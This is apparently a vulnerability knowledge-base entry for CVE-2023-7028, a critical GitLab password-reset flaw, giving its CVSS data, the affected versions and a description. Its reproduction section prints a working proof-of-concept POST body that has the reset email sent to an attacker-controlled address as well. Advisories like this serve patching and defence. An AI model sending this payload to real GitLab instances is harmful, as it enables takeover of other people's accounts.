Knowledge Base

CVE-2023-7028

Updated 26 May 2026

Background

Password Reset Account Takeover

  1. CVSS
    10.0Critical
  2. VECTOR
    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
  3. IMPACT
    Account takeover
  1. AFFECTED
    GitLab CE/EE16.1< 16.1.6
  2. GitLab CE/EE16.2< 16.2.9
  3. GitLab CE/EE16.3< 16.3.7
  4. GitLab CE/EE16.4< 16.4.5
  5. GitLab CE/EE16.5< 16.5.6
  6. GitLab CE/EE16.6< 16.6.4
  7. GitLab CE/EE16.7< 16.7.2

A vulnerability in self-managed GitLab Community Edition (CE) and Enterprise Edition (EE) allows account takeover through password reset emails sent to unverified addresses. By supplying an array of email addresses in the password reset request, an attacker can receive the reset token at an address they control without any verification.

Reproduction

POC || GTFO

Send the following POST body to the password reset endpoint. The reset email is delivered to both addresses — including the attacker's:

http
user[email][]=valid@email.com&user[email][]=attacker@email.com
References

Further reading